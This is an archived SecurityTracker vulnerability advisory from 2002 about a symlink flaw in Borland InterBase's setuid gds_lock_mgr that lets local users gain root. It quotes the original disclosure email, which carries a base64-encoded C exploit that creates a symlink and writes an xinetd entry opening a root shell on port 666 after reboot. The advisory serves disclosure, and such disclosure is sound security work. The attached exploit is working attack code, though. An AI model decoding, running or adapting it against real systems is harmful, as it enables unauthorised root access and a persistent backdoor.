SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Database)  >  InterBase Vendors:  Borland
Borland InterBase 'gds_lock_mgr' Temporary File Security Hole Gives Local Users Root Access
SecurityTracker Alert ID:  1005289
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 26 2002
Impact:  Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): 6.5
Description:  A vulnerability was reported in the Borland InterBase gds_lock_mgr database component. A local user can write arbitrary code to certain files with root privileges.

A local user can create a symbolic link from an arbitrary file (for example, a backdoor xinetd process) to a specially named temporary file used by InterBase. Then, the local user can execute gds_lock_mgr to cause the arbitrary symlink file to be created with the privileges of gds_lock_mgr. Arbitrary code can then be written to the file and executed when the host is rebooted.

According to the report, 'gds_lock_mgr' is configured with set user id (setuid) root privileges.

The vendor has reportedly been notified.

[Editor's note: As noted in this report, the vulnerability described in this alert is different than the gds_lock_mgr buffer overflow that was reported in June 2002.]
Impact:  A local user can write to arbitrary files with root privileges to gain root access on the system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.borland.com/interbase/ (Links to External Site)
Cause:  Access control error, State error
Underlying OS:  Linux (Any), UNIX (Solaris - SunOS)
Reported By:  <grazer@digit-labs.org>
Message History:   None.

 Source Message Contents
Date:  Wed, 25 Sep 2002 12:05:32 -0700 (PDT)
From:  <grazer@digit-labs.org>
Subject:  Borland Interbase local root exploit

 

--1070528868-1989719880-1032980732=:11264
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hello,

I've found a bug in the Interbase gds_lock_mgr binary which is shipped
with all versions of the Sun Cobalt RAQ (XTR/4/550 etc.) and is suid by
default.

Borland did not respond to my emails. The exploit is attached.
Note: other bug than disclosed by snosoft some weeks ago.

Sincerely yours,

Wouter ter Maat aka grazer


--1070528868-1989719880-1032980732=:11264
Content-Type: TEXT/x-csrc; name="interbase-gds-exploit.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.33.0209251205320.11264@bespin.org>
Content-Description: 
Content-Disposition: attachment; filename="interbase-gds-exploit.c"

Ly8gZ2RzX2xvY2tfbWdyIGVhc3kgbG9jYWwgcm9vdCBjb21wcm9taXNlDQov
LyBBbGwgY29iYWx0IExpbnV4IGFmZmVjdGVkLCBhbmQgY2VydGFpbiBtYW5k
cmFrZSBpbnN0YWxsYXRpb25zLg0KLy8gV291dGVyIHRlciBNYWF0IGFrYSBn
cmF6ZXIgLSBodHRwOi8vd3d3Lmktc2VjdXJpdHkubmwNCg0KI2luY2x1ZGUg
PHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lz
L3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3N0YXQuaD4NCiNpbmNsdWRlIDxz
eXMvdXRzbmFtZS5oPg0KDQojZGVmaW5lIEJEUEFUSCAiL2V0Yy94aW5ldGQu
ZC94aW5ldGRiZCINCiNkZWZpbmUgR0RTQklOICIvb3B0L2ludGVyYmFzZS9i
aW4vZ2RzX2xvY2tfbWdyIg0KDQppbnQgbWFpbigpIHsNCg0Kc3RydWN0IHV0
c25hbWUgYnVmOw0KY2hhciBwYXRoWzI0XSwgbG5jWzM0XTsNCiANCkZJTEUg
KmZkOw0KDQovKiBjaGVjayBmb3IgYSByb290c2hlbGwgb24gcG9ydCA2NjYg
YWZ0ZXIgdGhlIG1hY2hpbmUgaGFzIHJlYm9vdGVkLg0KICogZXhwbG9pdCB3
cml0dGVuIHRvIHdvcmsgb24gYSByYXE1NTAgdXNpbmcgeGluZXRkDQogKi8N
Cg0KY2hhciAqaGV4YmQgPSAiXHg3M1x4NjVceDcyXHg3Nlx4NjlceDYzXHg2
NVx4MjBceDc4XHg2OVx4NmVceDY1XHg3NFx4NjQiDQogICAgICAgICAgICAg
ICJceDYyXHg2NFxuXHg3YlxuXHg2NFx4NjlceDczXHg2MVx4NjJceDZjXHg2
NVx4MjBceDNkXHgyMCINCiAgICAgICAgICAgICAgIlx4NmVceDZmXG5ceDcw
XHg3Mlx4NmZceDc0XHg2Zlx4NjNceDZmXHg2Y1x4MjBceDNkXHgyMFx4MzYi
DQogICAgICAgICAgICAgICJceDM2XHgzNlxuXHg3M1x4NmZceDYzXHg2Ylx4
NjVceDc0XHg1Zlx4NzRceDc5XHg3MFx4NjVceDIwIg0KICAgICAgICAgICAg
ICAiXHgzZFx4MjBceDczXHg3NFx4NzJceDY1XHg2MVx4NmRcblx4NzdceDYx
XHg2OVx4NzRceDIwXHgzZCINCiAgICAgICAgICAgICAgIlx4MjBceDZlXHg2
ZlxuXHg3NVx4NzNceDY1XHg3Mlx4MjBceDNkXHgyMFx4NzJceDZmXHg2Zlx4
NzQiDQogICAgICAgICAgICAgICJcblx4NzNceDY1XHg3Mlx4NzZceDY1XHg3
Mlx4MjBceDNkXHgyMFx4MmZceDYyXHg2OVx4NmVceDJmIg0KICAgICAgICAg
ICAgICAiXHg3M1x4Njhcblx4NzNceDY1XHg3Mlx4NzZceDY1XHg3Mlx4NWZc
eDYxXHg3Mlx4NjdceDczXHgyMCINCiAgICAgICAgICAgICAgIlx4M2RceDIw
XHgyZFx4Njlcblx4N2RcbiI7DQoNCmZwcmludGYoc3Rkb3V0LCAiKioqIGdk
c19sb2NrX21nciBsb2NhbCByb290IGV4cGxvaXQgLSBncmF6ZXIgKioqXG4i
KTsNCg0KdW5hbWUoJmJ1Zik7DQpzZXRlbnYoIklOVEVSQkFTRSIsICIvdG1w
IiwgMSk7IA0Kc3ByaW50ZihwYXRoLCAiJXMiLCAiL3RtcC9pc2NfaW5pdDEu
Iik7DQpzdHJjYXQocGF0aCwgYnVmLm5vZGVuYW1lKTsNCg0KY2hkaXIoIi90
bXAiKTsNCnVtYXNrKDAwMCk7DQoNCnNwcmludGYobG5jLCAibG4gJXMgLXMg
JXMiLCBCRFBBVEgsIHBhdGgpOw0Kc3lzdGVtKGxuYyk7DQoNCmlmKGZkPWZv
cGVuKEdEU0JJTiwgInIiKSkgew0Kc3lzdGVtKEdEU0JJTik7IGNsb3NlKGZk
KTsgfQ0KZWxzZSB7DQpmcHJpbnRmKHN0ZGVyciwgIiVzIG5vdCBmb3VuZC4u
LlxuIiwgR0RTQklOKTsgDQpleGl0KDApOyB9DQoNCmlmKGZkPWZvcGVuKEJE
UEFUSCwgInciKSkgeyANCmZwcmludGYoc3RkZXJyLCIgICAgIGV4cGxvaXQg
c3VjY2VzZnVsbC4uLlxuIik7DQpmcHJpbnRmKGZkLCAiJXMiLCBoZXhiZCk7
IGNsb3NlKGZkKTt9DQplbHNlIHsNCmZwcmludGYoc3RkZXJyLCAiZXhwbG9p
dCBmYWlsZWQuLi5cbiIpOyANCmV4aXQoMCk7IH0NCg0KfQ0KDQo=
--1070528868-1989719880-1032980732=:11264--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC